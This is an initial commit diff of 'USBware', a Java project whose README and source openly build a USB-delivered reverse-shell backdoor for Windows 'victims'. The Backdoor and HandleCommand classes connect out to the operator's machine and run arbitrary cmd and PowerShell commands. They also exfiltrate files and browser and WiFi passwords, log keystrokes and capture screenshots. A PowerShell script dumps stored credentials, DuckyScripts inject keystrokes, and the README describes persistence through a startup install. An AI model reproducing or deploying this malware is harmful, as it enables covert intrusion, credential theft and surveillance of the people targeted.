Initial commit

.classpath

@@ -0,0 +1,9 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<classpath>
+	<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.8"/>
+	<classpathentry kind="src" path="src"/>
+	<classpathentry kind="lib" path="libs/commons-io-2.6.jar"/>
+	<classpathentry kind="lib" path="libs/JNativeHook.jar"/>
+	<classpathentry kind="lib" path="libs/mslinks.jar"/>
+	<classpathentry kind="output" path="bin"/>
+</classpath>

.gitattributes

@@ -0,0 +1,2 @@
+# Auto detect text files and perform LF normalization
+* text=auto

.gitignore

@@ -0,0 +1,2 @@
+/bin/
+/.settings/

.project

@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+	<name>USBware</name>
+	<comment></comment>
+	<projects>
+	</projects>
+	<buildSpec>
+		<buildCommand>
+			<name>org.eclipse.jdt.core.javabuilder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+	</buildSpec>
+	<natures>
+		<nature>org.eclipse.jdt.core.javanature</nature>
+	</natures>
+</projectDescription>

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2019 ThatcherDev
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,64 @@
+# USBware
+USBware is a program can convert a USB drive into a tool that installs/runs a reverse shell backdoor on a victim's Windows PC, as well as control and send commands to this backdoor.
+
+## Features
+USBware converts a USB drive into a backdoor or backdoor installation tool. 
+
+This backdoor can:
+- Run Command Prompt commands
+- Run PowerShell scripts
+- Run DuckyScripts to inject keystrokes
+- Exfiltrate files based on extension
+- Exfiltrate Microsoft Edge and WiFi passwords
+- Send and receive files to and from victim's computer
+- Start a KeyLogger
+- Get a screenshot of victim's computer
+
+This backdoor is created through server-client socket connections, with your computer acting as the server, and your victim's computer acting as a client.
+
+To convert a USB drive into a backdoor or backdoor installation tool, USBware:
+- Writes and encrypts your private IP address to 'ip.txt' on the USB drive. This is needed for the victim's computer, the client, to connect to your computer, the server.
+- Either the backdoor or backdoor installation '.exe' executable is copied to the USB drive.
+- If desired, a Java Runtime Environment is copied to the USB drive. 
+- All '.duck' DuckyScripts and '.ps1' PowerShell scritps are copied to the USB drive.
+
+After conversion, the USB drive should be inserted into a victim's PC and 'run.exe' should be executed. This will:
+- Display a message with the vitim's current WiFi connection along with the password (if avaliable).
+- Either run or install the backdoor.
+  - If the backdoor is set to install, 'run.exe' will:
+    - Install all necessary backdoor files to 'C:\ProgramData\USBDrivers'.
+    - Add backdoor to startup.
+    - Start the backdoor.
+  - If the backdoor is set to run, 'run.exe' will:
+    - Start the backdoor.
+
+Once running, to control the backdoor you must return to USBware and run option 1 at start while being connecting to the same WiFi network as the victim's computer.
+
+## Requirements
+- Java must be installed and added to PATH.
+- You must use the same computer to convert the USB drive and control the backdoor.
+  - The computer used to convert the USB drive must be on the same WiFi network as the victim's computer.
+  - The private IP address of this computer must remain static in the time between converting the USB drive and controlling the backdoor.
+- The computer used to control the backdoor must have their firewall deactivated.
+- If 'run.exe' is set to install the backdoor, it must be run s administrator to add the backdoor to startup.
+
+## Compatibility
+USBware is compatible with Windows and Linux, while the backdoor is only compatible with Windows.
+
+## Installation
+Download and extract the desired version of USBware from the [release page](https://github.com/ThatcherDev/USBware/releases).
+
+## Usage
+- Open a terminal window (cmd or bash).
+- CD to the directory containing 'USBware.jar':
+```
+cd path\to\USBware
+```
+- Run USBware
+```
+java -jar USBware.jar
+```
+
+## License
+- [MIT](https://choosealicense.com/licenses/mit/)
+- Copyright 2019© ThatcherDev.

files/scripts/BrowserCreds.ps1

@@ -0,0 +1,6 @@
+$filename="output.file"
+[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
+$creds = (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll()
+foreach ($c in $creds) {$c.RetrievePassword()}
+$creds | Format-List -Property Resource,UserName,Password | Out-File $filename
+exit

files/scripts/altf4.duck

@@ -0,0 +1 @@
+ALT F4

files/scripts/powershell.duck

@@ -0,0 +1,8 @@
+GUI r
+DELAY 100
+STRING powershell.exe
+DELAY 100
+ENTER
+DELAY 1000
+CONTROL v
+ENTER

src/thatcherdev/usbware/backdoor/Backdoor.java

@@ -0,0 +1,90 @@
+package thatcherdev.usbware.backdoor;
+
+import java.io.File;
+import java.io.FileNotFoundException;
+import java.io.PrintWriter;
+import java.net.Socket;
+import java.util.Scanner;
+import javax.swing.JOptionPane;
+import thatcherdev.usbware.backend.Utils;
+
+public class Backdoor {
+
+	public static String ip;
+	private static Socket socket;
+	private static Scanner in;
+	public static PrintWriter out;
+
+	/**
+	 * Starts backdoor shell.
+	 * 
+	 * If run for the first time, creates 'gathered' directory, sets {@link ip} to
+	 * server IP address using {@link getIP()}, and displays WiFi and backdoor
+	 * information if running from a USB drive.
+	 * <p>
+	 * Attempts to connect to server with {@link ip} on port 1025. Once connected,
+	 * initiates {@link in} and {@link out} and starts infinite loop that gets
+	 * command from server with {@link in} and handles command with
+	 * {@link HandleCommand.handle(String command)}. If exception is thrown,
+	 * {@link socket}, {@link in}, and {@link out} are closed and
+	 * {@link main(String[] args} is run.
+	 * 
+	 * @param args
+	 */
+	public static void main(String[] args) {
+		if(args.length==0) {
+			String disp=null;
+			try {
+				new File("gathered").mkdir();
+				ip=getIP();
+				disp="Backdoor running!\n\nTo control backdoor, connect to:\n"+Utils.currentConnection()+"\nand run option 1 in USBware";
+			}catch (Exception e) {
+				disp="An error occurred:\n"+e.getMessage();
+			}finally {
+				if(!System.getProperty("user.dir").equals("C:\\ProgramData\\USBDrivers"))
+					JOptionPane.showMessageDialog(null, disp, "Backdoor control information", JOptionPane.INFORMATION_MESSAGE);
+				if(disp.contains("An error occurred"))
+					System.exit(0);
+			}
+		}
+		try {
+			while(true)
+				try {
+					socket=new Socket(ip, 1025);
+					break;
+				}catch (Exception e) {
+					Thread.sleep(3000);
+					continue;
+				}
+			in=new Scanner(socket.getInputStream());
+			out=new PrintWriter(socket.getOutputStream(), true);
+			while(true) {
+				String command=in.nextLine();
+				HandleCommand.handle(command);
+			}
+		}catch (Exception e) {
+			try {
+				if(socket!=null)
+					socket.close();
+				if(in!=null)
+					in.close();
+				if(out!=null)
+					out.close();
+				main(new String[] {""});
+			}catch (Exception e1) {}
+		}
+	}
+
+	/**
+	 * Gets and decrypts IP address of server form 'ip.txt'.
+	 * 
+	 * @return IP address of server
+	 * @throws FileNotFoundException
+	 */
+	private static String getIP() throws FileNotFoundException {
+		Scanner in=new Scanner(new File("ip.txt"));
+		String ip=Utils.crypt(in.nextLine(), "USBwareIP");
+		in.close();
+		return ip;
+	}
+}

src/thatcherdev/usbware/backdoor/HandleCommand.java

@@ -0,0 +1,95 @@
+package thatcherdev.usbware.backdoor;
+
+import java.awt.Rectangle;
+import java.awt.Robot;
+import java.awt.Toolkit;
+import java.io.File;
+import java.util.ArrayList;
+import java.util.Arrays;
+import javax.imageio.ImageIO;
+import thatcherdev.usbware.backend.DuckyScripts;
+import thatcherdev.usbware.backend.Exfil;
+import thatcherdev.usbware.backend.FTP;
+import thatcherdev.usbware.backend.KeyLogger;
+import thatcherdev.usbware.backend.Utils;
+
+public class HandleCommand {
+
+	/**
+	 * Handles commands given to backdoor by setting {@link send} to appropriate
+	 * response. {@link Backdoor.out} is then used to send response followed by a
+	 * token to signal end of response.
+	 * 
+	 * @param command command given to backdoor from server.
+	 */
+	public static void handle(String command) {
+		String send="";
+		if(command.equals("help"))
+			send="[cmd] Run Command Prompt commands\n[ps] Run a PowerShell script\n[ds] Run a DuckyScript\n"+"[exfiles] Exfiltarte files based on extension\n[expass] Exfiltrate Microsoft Edge and WiFi passwords\n"
+					+"[filesend] Send a file to victim's computer\n[filerec] Receive a file from victim's computer\n"+"[keylog] Start a KeyLogger on victim's computer\n[ss] Get screenshot of vitim's computer";
+		else if(command.startsWith("cmd"))
+			send=Utils.runCommand(command.substring(4));
+		else if(command.startsWith("ps"))
+			if(Utils.runPSScript(command.substring(3)))
+				send="PowerShell script '"+command.substring(3)+"' successfully ran";
+			else
+				send="An error occurred when trying to run PowerShell script '"+command.substring(3)+"'";
+		else if(command.startsWith("ds"))
+			if(DuckyScripts.run(command.substring(3)))
+				send="DuckyScript '"+command.substring(3)+"' successfully ran";
+			else
+				send="An error occurred when trying to run DuckyScript '"+command.substring(3)+"'";
+		else if(command.startsWith("exfiles"))
+			if(Exfil.exfilFiles(command.substring(command.indexOf(" "), command.indexOf("*")), new ArrayList<String>(Arrays.asList(command.substring(command.indexOf("*")+1).split(",")))))
+				send="Files exfiltrated to '"+System.getProperty("user.dir")+"\\gathered\\ExfiltedFiles' on victim's computer";
+			else
+				send="An error occurred when trying to exfiltrate files";
+		else if(command.equals("expass")) {
+			if(Exfil.exfilBroserCreds())
+				send+="Microsoft Edge and Internet Explorer passwords exfiltrated to '"+System.getProperty("user.dir")+"\\gathered\\BrowserPasswords.txt' on vitim's computer\n";
+			else
+				send+="An error occurred when trying to exfiltrate Microsoft Edge and Internet Explorer passwords\n";
+			if(Exfil.exfilWiFi())
+				send+="WiFi passwords exfiltrated to '"+System.getProperty("user.dir")+"\\gathered\\WiFiPasswords.txt' on victim's computer";
+			else
+				send+="An error occurred when trying to exfiltrate WiFi passwords";
+		}else if(command.startsWith("filesend")) {
+			try {
+				Thread.sleep(2000);
+			}catch (InterruptedException e) {}
+			if(FTP.backdoor(command.substring(9), "rec", Backdoor.ip))
+				send="File sent";
+			else
+				send="An error occurred when trying to send file";
+		}else if(command.startsWith("filerec")) {
+			try {
+				Thread.sleep(2000);
+			}catch (InterruptedException e) {}
+			if(FTP.backdoor(command.substring(8), "send", Backdoor.ip))
+				send="File received";
+			else
+				send="An error occurred when trying to receive file";
+		}else if(command.equals("keylog")) {
+			Thread keyLogger=new Thread() {
+				@Override
+				public void run() {
+					KeyLogger.start();
+				}
+			};
+			keyLogger.start();
+			send="Keys are being logged to '"+System.getProperty("user.dir")+"\\gathered\\keys.log' on victim's computer";
+		}else if(command.equals("ss"))
+			try {
+				Thread.sleep(2000);
+				ImageIO.write(new Robot().createScreenCapture(new Rectangle(Toolkit.getDefaultToolkit().getScreenSize())), "png", new File("screenshot.png"));
+				FTP.backdoor("screenshot.png", "send", Backdoor.ip);
+				new File("screenshot.png").delete();
+				send="Screenshot received";
+			}catch (Exception e) {
+				send="An error occurred when trying to receive screenshot";
+			}
+		else if(!command.isEmpty())
+			send="Command not found";
+		Backdoor.out.println(send+"\n!$end$!");
+	}
+}